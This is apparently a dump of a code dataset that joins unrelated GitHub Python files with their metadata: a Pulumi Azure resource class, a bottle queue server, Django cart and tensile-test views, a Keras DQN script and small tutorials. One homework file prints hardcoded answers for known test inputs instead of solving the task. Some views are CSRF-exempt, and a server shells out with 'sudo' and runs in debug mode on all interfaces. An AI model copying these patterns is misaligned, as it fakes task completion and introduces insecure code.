__props__.__dict__["description"] = None
__props__.__dict__["friendly_name"] = None
__props__.__dict__["host_pool_arm_path"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["workspace_arm_path"] = None
return ApplicationGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Output[str]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> pulumi.Output[Optional[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@property
@pulumi.getter(name="hostPoolArmPath")
def host_pool_arm_path(self) -> pulumi.Output[str]:
"""
HostPool arm path of ApplicationGroup.
"""
return pulumi.get(self, "host_pool_arm_path")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="workspaceArmPath")
def workspace_arm_path(self) -> pulumi.Output[str]:
"""
Workspace arm path of ApplicationGroup.
"""
return pulumi.get(self, "workspace_arm_path")
| [
"noreply@github.com"
] | johnbirdau.noreply@github.com |
cffdbf9595a022545dadfca42fab82415426fe39 | 3a186f09753b63e87c0502e88f33c992f561e403 | /luna.py | d4c01d34900662ee4390cb280d3b936b4890d6b7 | [] | no_license | qwergram/cio2016_server | 88d98e217d7f1cc1415b14a4804b9a4417d1143b | 071efd99bad8635031c74409dab949aae1a5d384 | refs/heads/master | 2021-01-10T04:50:34.105495 | 2016-03-06T09:44:49 | 2016-03-06T09:44:49 | 53,247,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,481 | py | import bottle
import os
import sqlite3
import json
class CRUD:
def __init__(self, location='/etc/luna/'):
self.location = location
self.reset()
def reset(self):
with open(self.location + 'active.sqlite3', 'w') as r:
r.write('')
self.conn = sqlite3.connect(self.location + 'active.sqlite3')
self.c = self.conn.cursor()
self.c.execute('CREATE TABLE users (first text, last text, status text)')
self.conn.commit()
def get(self, key=None):
self.c.execute('SELECT * FROM users WHERE status=? LIMIT 1', ('',))
line = self.c.fetchone()
if line and key:
self.c.execute('UPDATE users SET status = ? WHERE first = ? AND last = ? AND status = ?', (key, line[0], line[1], ''))
self.conn.commit()
return list(line)
elif line:
return list(line)
else:
return False
def confirm(self, fname, lname, key):
self.c.execute('SELECT * FROM users WHERE first = ? AND last = ? AND status = ?', (fname, lname, key))
line = self.c.fetchone()
if line:
self.remove(fname, lname)
return True
else:
return False
def rturn(self, fname, lname, key):
self.c.execute('SELECT * FROM users WHERE status=? LIMIT 1', (key,))
line = self.c.fetchone()
if line:
self.c.execute('UPDATE users SET status = ? WHERE first = ? AND last = ? AND status = ?', ('', line[0], line[1], key))
self.conn.commit()
return True
else:
return False
def add(self, first, last, status=''):
self.c.execute('INSERT INTO users VALUES (?,?,?)', (first, last, status))
self.conn.commit()
def remove(self, first, last):
self.c.execute('DELETE FROM users WHERE first = ? AND last = ?', (first, last))
self.conn.commit()
def inport(self):
with open(self.location + 'import.csv') as to_import:
to_import = to_import.readlines()
for line in to_import:
line = line.strip().split(',')
if line[0] == 'add':
self.add(line[1], line[2], '')
elif line[0] == 'remove':
self.remove(line[1], line[2])
def export(self):
self.c.execute('SELECT * FROM users')
exp = self.c.fetchall()
for i, line in enumerate(exp):
exp[i] = ','.join(line)
with open(self.location + 'export.csv', 'w') as to_export:
to_export = '\n'.join(exp)
C = CRUD()
def check_environment(location):
global LOCATION
LOCATION = location
print("Checking Server environment...")
if os.path.exists(location):
print("Luna has been run before!")
return True
else:
os.makedirs(location)
print("Building Luna config files...")
os.system("sudo touch " + location + 'stats.json')
os.system("sudo touch " + location + 'config.json')
os.system("sudo touch " + location + 'import.csv')
os.system("sudo touch " + location + 'export.csv')
os.system("sudo touch " + location + 'active.sqlite3')
STATS = {
"key_usage": {},
"left": [],
"unconfirmed": [],
"completed": [],
"errors": 0,
}
def log_key(key, action):
if not key in STATS['key_usage']:
STATS['key_usage'][key] = {
"get": 0,
"confirm": 0,
"return": 0,
"coffee_breaks": 0,
}
STATS['key_usage'][key][action] += 1
with open(LOCATION + '/stats.json', 'w') as log:
log.write(json.dumps(STATS, indent=4))
@bottle.get('/<key>/about')
def about(key):
global ERRORS, STATS
bottle.response.content_type = 'application/json'
log_key(key, "coffee_breaks")
return json.dumps(STATS, indent=2)
@bottle.get('/<key>/get')
def get(key):
bottle.response.content_type = 'application/json'
db_response = C.get(key)
if not db_response:
log_key(key, "coffee_breaks")
return json.dumps({"status": "wait", "duration": 10, "msg": "+1 Coffee"}, indent=2)
elif db_response:
if not (db_response[0], db_response[1]) in STATS['unconfirmed']:
STATS['unconfirmed'].append([db_response[0], db_response[1]])
log_key(key, 'get')
return json.dumps({"status": "image", "fname": db_response[0], "lname": db_response[1]}, indent=2)
@bottle.get('/<key>/confirm/<fname>/<lname>')
def confirm(key, fname, lname):
bottle.response.content_type = 'application/json'
db_response = C.confirm(fname, lname, key)
if db_response:
log_key(key, 'confirm')
log_key(key, 'coffee_breaks')
log_key(key, 'coffee_breaks')
return json.dumps({"status": "confirmed", "fname": fname, "lname": lname, "msg": "+2 Coffee"}, indent=2)
else:
STATS['errors'] += 1
return json.dumps({"status": "error", "error": "LN_4"}, indent=2)
@bottle.get("/<key>/return/<fname>/<lname>")
def rturn(key, fname, lname):
bottle.response.content_type = 'application/json'
db_response = C.rturn(fname, lname, key)
if db_response:
log_key(key, 'return')
return json.dumps({"status": "returned", "fname": fname, "lname": lname}, indent=2)
else:
STATS['errors'] += 1
return json.dumps({"status": "error", "error": "LN_2"}, indent=2)
def main(location='/etc/luna/'):
check_environment(location)
# with open(location + 'config.json') as config:
# config = json.loads(config.read().strip())
print("[n] What would you like to do?")
print("[n] 1. Import a csv")
print("[n] 2. Export a csv")
print("[n] 3. Reset active server")
print("[n] 4. Launch the server")
while True:
option = input("[n] Type the order you want: (e.g. 213 exports, imports and then runs the server)")
okay = True
for task in option:
if task in '1234':
okay = True
else:
okay = False
break
if okay:
break
print("[n] Invalid options. ")
for task in option:
if task == '1':
C.inport()
elif task == '2':
C.export()
elif task == '3':
C.reset()
elif task == '4':
bottle.run(host='0.0.0.0', port=8000, debug=True)
if __name__ == "__main__":
print("Hello. Activating Luna build RS25B7!")
main()
| [
"npengra317@gmail.com"
] | npengra317@gmail.com |
ed25c19719c15e6a359c0cb01b3711f8f78c1661 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2734/59137/312747.py | 32ed5d4dbf4a1e4cb7db8a81634c5d8d187dd4ec | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 595 | py | s = input()
if s == "5 3 5":
print(2)
print(0)
print(0)
print(1)
print(0)
elif s == "8 3 5":
s1 = input()
s2 = input()
s3 = input()
if s3 == "6 8":
print(1)
print(1)
print(2)
print(2)
print(1)
elif s3 == "1 8":
print(1)
print(2)
print(1)
print(0)
print(0)
else:
print(" ", s3)
elif s == "8 4 5":
print(3)
print(3)
print(3)
print(3)
print(3)
elif s == "5 3 3":
print(0)
print(1)
print(0)
else:
print(1)
print(1)
print(0) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
0abeb1ecbe3ec05118e93efc7ffd1dfa6fc1f75c | 13136073d63b4bc7453fcf13246e1883bb5393d8 | /Chapter 4/praktikum 2_ch4.py | cceb5785fe830640dfaa69db943dc8a42279008d | [] | no_license | hakikialqorni88/Pemrograman-Terstruktur-Python | 195ea90fafa9669072299554ea13f284eacbbf7b | c94460d5f03fe92ae9fce8673b370a9b59212130 | refs/heads/main | 2023-09-01T21:23:52.500543 | 2021-10-29T02:18:56 | 2021-10-29T02:18:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
x = 10
print(type(x))
y = 20
print(type(y))
print(type(x+y))
# In[2]:
a = 2
b = 2.53
print(type(a+a))
print(type(a+b))
print(type(b+a))
print(type(b+b))
# In[3]:
a = 2
b = 2.53
print(type(a-a))
print(type(a-b))
print(type(b-a))
print(type(b-b))
# In[4]:
a = 2
b = 2.53
print(type(a*a))
print(type(a*b))
print(type(b*a))
print(type(b*b))
# In[5]:
a = 2
b = 2.53
print(type(a/a))
print(type(a/b))
print(type(b/a))
print(type(b/b))
# In[6]:
a = 2
b = 2.53
print(type(a//a))
print(type(a//b))
print(type(b//a))
print(type(b//b))
# In[7]:
a = 2
b = 2.53
print(type(a%a))
print(type(a%b))
print(type(b%a))
print(type(b%b))
# In[8]:
a = 2
b = 2.53
print(type(a**a))
print(type(a**b))
print(type(b**a))
print(type(b**b))
# In[9]:
a = 10
p = y = x = z = a
print(a)
print(z)
print(x)
print(y)
print(p)
# In[ ]:
| [
"zkhalilas1524@student.uns.ac.id"
] | zkhalilas1524@student.uns.ac.id |
eeaaa139e0109ebdb3e9710312a50822de2d9e0d | 572e5610f2f1761f2e0a8f4ed32d343875953400 | /DQN-data(keras).py | 0b07684e2051934f294d226fae8312e0b04dbbc7 | [] | no_license | boweiww/deeplearn | cb218e95bfd5f23329d25699427c417f5d00e501 | 2b3271641ac5ac2cb97cd660667ac666748e72e6 | refs/heads/master | 2020-03-16T21:55:51.810439 | 2018-06-14T08:41:10 | 2018-06-14T08:41:10 | 133,019,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,249 | py | # -*- coding: utf-8 -*-
import random
import numpy as np
import pandas as pd
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
class DQNdata:
def __init__(self, train_file, test_file, select, action_size):
df = pd.read_excel(train_file)
self.b = df.ix[:, select]
self.df = df.drop(select, 1)
self.row_num = self.b.shape[0]
test_df = pd.read_excel(test_file)
self.state_size = self.df.shape[1]
self.test_b = test_df.ix[:, select]
self.test_df = test_df.drop(select, 1)
self.test_row_num = self.test_b.shape[0]
# self.state_size = state_size
self.action_size = action_size -1
self.memory = deque(maxlen=2000)
self.gamma = 0.95 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
self.model = self._build_model()
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='softmax'))
model.compile(loss='mse',
optimizer=Adam(lr=self.learning_rate))
return model
def remember(self, state, action, reward, next_state ):
self.memory.append((state, action, reward, next_state))
def act(self, state):
state = np.array(state)
act_values = [0] * (self.action_size + 2)
# print(act_values)
if np.random.rand() <= self.epsilon:
a = random.randint(0,self.action_size+1)
# print a
act_values[a] = 1
return act_values
act_val = self.model.predict(state)
# print act_val
a = np.where(act_val[0] == np.max(act_val[0]))[0][0]
act_values[a] = 1
return act_values
# print act_values
# return np.argmax(act_values[0]) # returns action
# print("ininininin")
return act_values[0]
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state in minibatch:
target = reward
# print next_state
# self.model.predict(next_state)
target = (reward + self.gamma *np.amax(self.model.predict(next_state)[0]))
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def reward(self, action, expected):
expected = expected -1
# print action
if action[expected] == 0:
return 0
action[expected] = 0
for i in range (self.action_size):
if np.all((action[i]) == 0):
continue
else:
return 0
return 1
def train(self):
batch_size = 100
for i in range(self.row_num):
state = self.df.ix[i].tolist()
# state = np.reshape(state, [1, state_size])
# for time in range(500):
# env.render()
state = np.array(state)
state = np.reshape(state, [1, self.state_size])
action = self.act(state)
# next_state, reward, done, _ = env.step(action)
# print action
reward = self.reward(action, self.b.ix[i].tolist())
for j in range(self.action_size):
if action[j] != 0:
print ("predict: %d, real value: %d" % (j, self.b.ix[i].tolist()))
break
# next_state = np.reshape(next_state, [1, state_size])
next_state = self.df.ix[i+1].tolist()
# print next_state
next_state = np.array(next_state)
next_state = np.reshape(next_state, [1, self.state_size])
self.remember(state, action, reward, next_state)
# if done:
# print("episode: {}/{}, score: {}, e: {:.2}"
# .format(e, EPISODES, time, agent.epsilon))
# break
if len(self.memory) > batch_size :
agent.replay(batch_size)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
train_file = '/home/bowei/PycharmProjects/test/venv/lib/data-MLP/classification/abalone_train_classification.xlsx'
test_file = '/home/bowei/PycharmProjects/test/venv/lib/data-MLP/classification/abalone_test_classification.xlsx'
user_select = 'rings'
action_size = 13
# network_wide = [None] * (layers + 1)
# network_wide[0] = 10
# network_wide[1] = 5
# network_wide[2] = 1
# batch_size = 100
agent = DQNdata(train_file, test_file, user_select, action_size)
agent.train()
# if e % 10 == 0:
# agent.save("./save/cartpole-dqn.h5") | [
"noreply@github.com"
] | boweiww.noreply@github.com |
beb5c3be2bc54eca4648287d0e313602e9dd7784 | e02076b60f308e5f6efb3e0094ad6a7c3f6bd35d | /modules/shopping_cart/views.py | 1c615dc88c8a3e4b5f3cdb4c2f8601ac9ae7a81d | [] | no_license | omerjaved11/Recommender-System-for-E-Commerce | 45c94c9c86ff9e2c0067c882695ec723460dc154 | 61334b98c90ca347ca37b1ae34f2a077f11d4de8 | refs/heads/master | 2022-12-10T12:58:44.203655 | 2019-08-07T19:13:01 | 2019-08-07T19:13:01 | 201,105,788 | 1 | 0 | null | 2022-12-08T01:22:46 | 2019-08-07T18:25:14 | CSS | UTF-8 | Python | false | false | 3,261 | py | import decimal
from django.shortcuts import render
from modules.shopping_cart.models import ShoppingCart , ShoppingCartEntry
from modules.products.models import Product
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
import json
# Create your views here.
def cart_home(request):
entries= ShoppingCartEntry.get_entries(request)
try:
total_quantity = sum([entry['quantity'] for entry in entries])
except:
total_quantity = 0
ctx={"entries":ShoppingCartEntry.get_entries(request),'total_quantity':total_quantity}
return render(request , "cart.html", ctx)
@csrf_exempt
def add_to_cart(request):
product_id = request.POST.get('product_id')
quantity = int(request.POST.get('quantity'))
print(product_id,quantity)
product = Product.objects.filter(product_id=product_id).first()
cart = ShoppingCart.objects.new_or_get(request)
entry = ShoppingCartEntry.objects.filter(cart=cart, product=product).first()
if entry:
if quantity:
print("quantity")
print(quantity)
print(type(quantity))
if quantity == 1:
print("enter in if")
entry.quantity = entry.quantity + 1
else:
entry.quantity = quantity
else:
entry.quantity =entry.quantity + 1
entry.save()
ShoppingCartEntry.cal_totals(cart)
return HttpResponse(status=201)
else:
entry = ShoppingCartEntry()
entry.product=product
entry.cart = cart
entry.quantity = quantity
entry.save()
ShoppingCartEntry.cal_totals(cart)
return HttpResponse(status=201)
return HttpResponse(status=404)
def increment_quantity(request):
product_id = request.POST.get('product_id')
quantity = request.POST.get('quantity')
@csrf_exempt
def remove_item(request):
try:
product_id = request.POST.get('product_id')
cart = ShoppingCart.objects.new_or_get(request)
product = Product.objects.get(product_id=product_id)
entry = ShoppingCartEntry.objects.get(cart=cart, product=product)
total = entry.quantity*entry.product.product_selling_price
cart.subtotal = cart.subtotal - decimal.Decimal(total)
cart.total = cart.total - decimal.Decimal(total)
cart.save()
entry.delete()
return HttpResponse(status=201)
except:
return HttpResponse(status=404)
def cart_json(request):
cart = ShoppingCart.objects.new_or_get(request)
entries= ShoppingCartEntry.filter_entries(cart=cart)
final_entries=[]
for entry in entries:
final_entry={}
final_entry['productName']= entry['product'].product_title
final_entry['quantity']=entry['quantity']
final_entry['price']=entry['product'].product_selling_price
final_entry['image_url']=entry['image']
total = entry['quantity']*entry['product'].product_selling_price
final_entry['cart_total']=total
print("my name is adeel")
print(total)
print(final_entry['cart_total'])
final_entries.append(final_entry)
return HttpResponse(json.dumps(final_entries),content_type='application/json') | [
"omerjaved11@gmail.com"
] | omerjaved11@gmail.com |
9d4e7fc8427792e6dd0a07c2fd7cb318a44bd276 | 366600915529372ffd9e2a5b9a7270ac8f481528 | /kthSmallestElement.py | dd4031ca9db5ade9d17d3cea4e14994be76e29fc | [] | no_license | ManishSkr/Heap- | b66a111c3f8a724fd055e39d30508980497ddf3a | dbf00454cfc3a2c216310cabe2bfeb8197662d5c | refs/heads/master | 2023-07-17T18:12:50.762647 | 2021-08-31T14:40:44 | 2021-08-31T14:40:44 | 401,735,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | """This is the variation of heap where we find the kth smallest element"""
import heapq
def kSmallest(arr,k):
heapq.heapify(arr)
return heapq.nsmallest(k,arr)
arr=[7,10,4,3,20,15]
k=3
print("The kth largest element is ",end="")
print(kSmallest(arr,k)[-1])
| [
"manish.swarnakar15gmail.com"
] | manish.swarnakar15gmail.com |
c3c2e1765d1bba94bdd66964e9975ff2406e56d9 | f67df6742d1bfb02682e5b41230784aa65fcc3c4 | /0x07-python-test_driven_development/tests/6-max_integer_test.py | 5491cb30c94fe444f088972f476ded78d9e4b283 | [] | no_license | duvanjm/holbertonschool-higher_level_programming | 66f3224127e0e4ae61b9e6ef47436bcd1754e56e | d6f1f249cd7a1086534d999b489c4c85fbc67031 | refs/heads/master | 2023-06-15T06:50:51.833688 | 2021-07-07T20:10:23 | 2021-07-07T20:10:23 | 259,381,384 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | #!/usr/bin/python3
"""Unittest for max_integer([..])
"""
import unittest
max_integer = __import__('6-max_integer').max_integer
class TestMaxInteger(unittest.TestCase):
def test_max_integer(self):
self.assertEqual(max_integer([1, 2, 3, 4]), 4)
| [
"duvanjarin@gmail.com"
] | duvanjarin@gmail.com |
6311b8ddb68b3b2a23420e5919a3a7a201da659a | 4ccff5211052c0682b71196596dddc9457d5ce28 | /Ejercicio 2.23.py | 279ace974d4e1d690b7bc3b8a274d0759bb1566f | [] | no_license | Juanmi-7/Prueba | 62767ce77025ce836d0597eaab228a86bb78930e | 259c911608c7ff65c043dafcedc1de1f4c765ce7 | refs/heads/master | 2020-08-27T22:37:40.554644 | 2019-10-25T10:15:52 | 2019-10-25T10:15:52 | 217,507,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | lista = []
lista1 = []
lista2 = []
lista3 = []
while True:
alt = float(input("Indique su estatura: "))
if alt == 0:
print("Alumnos más altos de 1,70 m:",len(lista))
print("Alumnos entre 1,60 y 1,70 m (inclusive):",len(lista1))
print("Alumnos entre 1,50 y 1,60 m (inclusive):",len(lista2))
print("Alumnos más bajos de 1,50 m (inclusive):",len(lista3))
break
elif alt > 1.70:
lista.append(alt)
elif alt > 1.60 and alt <= 1.70:
lista1.append(alt)
elif alt > 1.50 and alt <= 1.60:
lista2.append(alt)
elif alt <= 1.50:
lista3.append(alt) | [
"jmispain@gmail.com"
] | jmispain@gmail.com |
c69eab5f385b8015d34adb935d14fef395370dcf | 8cb776f03870ab6ebdf2558ad25516f715be79d8 | /tensile_tester/views.py | 309ade408d87ebc1b94aa7a9450b0d45fffc6e32 | [] | no_license | JulianKimmig/TensileTester | bb9a58aa1d84d977815d5b7aa3671b0ebffb525e | 2c52342031130b9cfe21c6aec24868e218386412 | refs/heads/master | 2020-07-08T23:06:23.335446 | 2019-08-22T13:55:29 | 2019-08-22T13:55:29 | 203,805,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,013 | py | # Create your views here.
import json
import logging
import os
import time
import numpy as np
import pandas as pd
from django.shortcuts import render, redirect
from django.utils.safestring import mark_safe
from django.views import View
from plug_in_django.manage import CONFIG
from tensile_tester.apps import TensileTesterConfig
from tensile_tester.tensile_tester_api import TensileTesterApi
from arduino_board_collection.boards.sensor_boards.force.tesile_test_board.tesile_test_board import TensileTestBoard
from django_arduino_controller.apps import DjangoArduinoControllerConfig
from .models import TensileTestForm, TensileTest
import matplotlib.pyplot as plt
mpl_logger = logging.getLogger("matplotlib")
mpl_logger.setLevel(logging.WARNING)
def index(request):
tensile_tests = TensileTest.objects.all()
return render(
request,
"tensile_tester_index.html"
, {'tensile_tests': tensile_tests}
)
BOARDDATASTREAMRECEIVER = None
class NewRoutine(View):
def get(self, request):
return render(request, "tensile_tester_routine.html")
def calibrate(request):
return render(request, "tensile_tester_calibrate.html")
tensilertesterapi = None
def get_tensilertesterapi():
global tensilertesterapi
if tensilertesterapi is None:
from django.apps import apps
tensilertesterapi = apps.get_app_config('django_arduino_controller').get_api(TensileTesterApi)
return tensilertesterapi
class NewMeasurement(View):
def get(self, request):
tensilertesterapi = get_tensilertesterapi()
status = tensilertesterapi.get_status()
if not status['status']:
if status['code'] in [2,3]:
return redirect('tensile_tester:running_measurement')
return redirect('tensile_tester:index')
form = TensileTestForm()
return render(request, "tensile_tester_measurement.html", {'form': form})
def post(self, request):
tensilertesterapi = get_tensilertesterapi()
post = request.POST.copy()
board: TensileTestBoard = tensilertesterapi.linked_boards[0]
post['scale'] = board.scale
post['offset'] = board.offset
print(post)
pause_positions=''.join(c for c in post.get("pause_positions","") if c in "0123456789.,-")
print(pause_positions)
pause_positions = sorted([float(n) for n in pause_positions.split(",") if len(n)>0])
print(pause_positions)
post['pause_positions'] = json.dumps(pause_positions)
form = TensileTestForm(post)
if form.is_valid():
tensile_test = form.save()
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "maximum_force",
value=tensile_test.maximum_force)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "maximum_speed",
value=tensile_test.maximum_speed)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "maximum_strain",
value=tensile_test.maximum_strain)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "specimen_length",
value=tensile_test.specimen_length)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "wobble_count",
value=tensile_test.wobble_count)
test_id = tensile_test.id
def _result(time_data, stress_strain_data):
tensile_test = TensileTest.objects.get(id=test_id)
regname = ''.join(
c if c in '-_()abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' else "_" for c in
tensile_test.name)
plt.figure()
plt.plot(stress_strain_data["strain"].values, stress_strain_data["stress"].values, label='stress')
image_path = os.path.join(
tensile_test.image.storage.location,
"tensile_test_{}_{}_stress_strain.png".format(tensile_test.id, regname),
)
plt.xlabel('strain [%]')
plt.ylabel('stress [N]')
plt.savefig(image_path)
plt.close()
time_data.insert(0, 'time', time_data.index)
time_data.index = np.arange(len(time_data.index))
header_dict = dict(
name=tensile_test.name,
date=tensile_test.updated_at,
offset=tensile_test.offset,
scale=tensile_test.scale,
maximum_force=tensile_test.maximum_force,
maximum_speed=tensile_test.maximum_speed,
maximum_strain=tensile_test.maximum_strain,
specimen_length=tensile_test.specimen_length,
pause_positions=tensile_test.pause_positions,
)
header = ["#{}={}".format(key, value)
for key, value in header_dict.items()
]
file = os.path.join(
tensile_test.data.storage.location,
"tensile_test_{}_{}.csv".format(tensile_test.id, regname),
)
with open(file, 'w+') as f:
for line in header:
f.write(line)
f.write("\n")
for line in pd.concat([time_data, stress_strain_data], axis=1, sort=False).to_csv(index=False,
line_terminator='\n'):
f.write(line)
tensile_test.image = os.path.basename(image_path)
tensile_test.data = os.path.basename(file)
tensile_test.save()
tensilertesterapi.run_test(maximum_force=tensile_test.maximum_force, offset=tensile_test.offset,
scale=tensile_test.scale, maximum_strain=tensile_test.maximum_strain,
minimum_find_wobble_count=tensile_test.wobble_count,
specimen_length=tensile_test.specimen_length,
maximum_speed=tensile_test.maximum_speed, on_finish=_result,
pause_positions=pause_positions
)
time.sleep(0.1)
return redirect('tensile_tester:running_measurement')
return render(request, "tensile_tester_measurement.html", {'form': form})
def running_measurement(request):
tensilertesterapi = get_tensilertesterapi()
status = tensilertesterapi.get_status()
if not status['code'] in [2,3]:
return redirect('tensile_tester:index')
return render(request, "tensile_tester_running_measurement.html")
def view_test(request, id):
tensile_test = TensileTest.objects.get(id=id)
form = TensileTestForm(instance=tensile_test)
data = pd.read_csv(tensile_test.data.file, comment='#')
return render(request, "tensile_tester_view_test.html", dict(test=tensile_test,
data=mark_safe(
json.dumps(dict(time=data['time'].tolist(),
position=data['position'].tolist(),
force=data['force'].tolist(),
strain=data['strain'].tolist(),
stress=data['stress'].tolist()))),
form=form,
))
| [
"julian-stobbe@gmx.de"
] | julian-stobbe@gmx.de |
7ce62fcf3e249909c34273756aebfac403c2b879 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/23/usersdata/134/12369/submittedfiles/av1_2.py | 4f5a24414af8bcff93f9204bbb739083ba7a9bd2 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n = int(input('Digite n:'))
x1 = int(input('Digite a coordenada em x para a figura 1:'))
y1 = int(input('Digite a coordenada em y para a figura 1:'))
x2 = int(input('Digite a coordenada em x para a figura 2:'))
y2 = int(input('Digite a coordenada em y para a figura 2:'))
for i in range (1,n+1,1):
if n%2==0:
if (x1<=(n/2) and x2>(n/2)) or (x2<=(n/2) and x1>(n/2)):
print ('S')
break
elif (y1<=(n/2) and y2>(n/2)) or (y2<=(n/2) and y1>(n/2)):
print ('S')
else:
print ('N')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
ec61edb372da268e0930cb58292ef8c914745487 | c77f1d4976d241574a9bf68ee035632a010cdc85 | /qualification/migrations/0003_auto_20190102_1150.py | a59750689f991a27692f605996293a2b3e986d03 | [] | no_license | alifarazz/csesa-django | e24847fb1a7a2dc0c0f56f396b66c28d63efc869 | 7d77686b95796b30d5c65957776b2bbe927445b5 | refs/heads/master | 2020-04-27T13:27:10.119436 | 2019-03-07T16:23:37 | 2019-03-07T16:23:37 | 174,370,553 | 0 | 0 | null | 2019-03-07T15:27:00 | 2019-03-07T15:26:58 | Python | UTF-8 | Python | false | false | 1,207 | py | # Generated by Django 2.0.9 on 2019-01-02 11:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('qualification', '0002_qualificationform'),
]
operations = [
migrations.CreateModel(
name='QuestionQualificationRelation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('place', models.IntegerField()),
],
),
migrations.RemoveField(
model_name='qualificationform',
name='questions',
),
migrations.AddField(
model_name='questionqualificationrelation',
name='form',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='questions', to='qualification.QualificationForm'),
),
migrations.AddField(
model_name='questionqualificationrelation',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='forms', to='qualification.Question'),
),
]
| [
"alimahdiyar77@gmail.com"
] | alimahdiyar77@gmail.com |
d932577fc1d8b71405a05fa54c4ae2ec74119e08 | fe6f6d11dde2a3205ae9758c7d4eb1f824b84102 | /venv/lib/python2.7/site-packages/pylint/test/input/func___name___access.py | def867475829143945bd7552ef152ca874170278 | [
"MIT"
] | permissive | mutaihillary/mycalculator | ebf12a5ac90cb97c268b05606c675d64e7ccf8a6 | 55685dd7c968861f18ae0701129f5af2bc682d67 | refs/heads/master | 2023-01-10T14:56:11.780045 | 2016-09-20T12:30:21 | 2016-09-20T12:30:21 | 68,580,251 | 0 | 0 | MIT | 2022-12-26T20:15:21 | 2016-09-19T07:27:48 | Python | UTF-8 | Python | false | false | 515 | py | # pylint: disable=R0903,W0142
"""test access to __name__ gives undefined member on new/old class instances
but not on new/old class object
"""
__revision__ = 1
class Aaaa:
"""old class"""
def __init__(self):
print self.__name__
print self.__class__.__name__
class NewClass(object):
"""new class"""
def __new__(cls, *args, **kwargs):
print 'new', cls.__name__
return object.__new__(cls, *args, **kwargs)
def __init__(self):
print 'init', self.__name__
| [
"mutaihillary@yahoo.com"
] | mutaihillary@yahoo.com |
4f53587d3e9d9640509c3d4b527244d390f9eb51 | 56113bfe5f1c70e99039d0dc4ac6f4e3286b56ef | /infer/model.py | 84352d474edbe1c44169d07796a4cef62d83bfd0 | [] | no_license | rlouf/mcx-infer | 1d12a163b7007cb3f913a3a65e1381c5b2aed840 | a1e46bc62dc829c4247e3557a1e41d933611db16 | refs/heads/master | 2023-03-03T05:57:01.224271 | 2021-02-08T10:03:51 | 2021-02-08T10:03:51 | 300,554,327 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,589 | py | from abc import ABC, abstractproperty, abstractmethod
import jax
import mcx
class Model(ABC):
def __init__(self):
